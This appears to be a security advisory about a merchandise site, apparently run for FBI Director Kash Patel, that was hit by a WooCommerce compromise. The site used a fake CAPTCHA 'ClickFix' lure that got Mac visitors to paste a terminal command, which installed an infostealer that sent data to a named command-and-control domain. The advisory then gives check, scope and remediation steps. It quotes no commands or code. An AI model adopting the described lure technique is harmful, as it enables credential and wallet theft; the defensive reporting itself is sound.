FBI Director Kash Patel's merchandise site (basedapparel.com) infected with WooCommerce ClickFix macOS infostealer; site taken offline
FBI Director Kash Patel's merchandise website basedapparel[.]com was taken offline on Friday after researchers documented a multi-stage WooCommerce compromise that stole payment data and targeted Mac users with a ClickFix attack. The site displayed a fake Cloudflare CAPTCHA prompting visitors to paste a command into their terminal; the macOS-specific shell command then downloaded a script-based infostealer that targets browsers, password vaults, and cryptocurrency wallets before compressing the data, exfiltrating to monterushy[.]com, and deleting itself. Researchers WifiRumHam and 'debbie' analyzed the live campaign on May 21-22; the site went offline on May 22. Similar infections seen across many compromised WooCommerce sites.
- Check
- Search outbound traffic for connections to monterushy[.]com and similar ClickFix C2 hosts since early May. Inventory WooCommerce sites your organization operates and confirm plugin integrity.
- Affected
- WooCommerce-powered e-commerce sites with vulnerable or unverified plugins. Mac users who visit compromised storefronts and are prompted to paste shell commands. Brand reputation risk for high-profile site owners.
- Fix
- Block monterushy[.]com at egress. Audit WooCommerce plugin authenticity via official channels. Train users (especially macOS) to never paste shell commands from a website. Apply EDR rules for ClickFix patterns.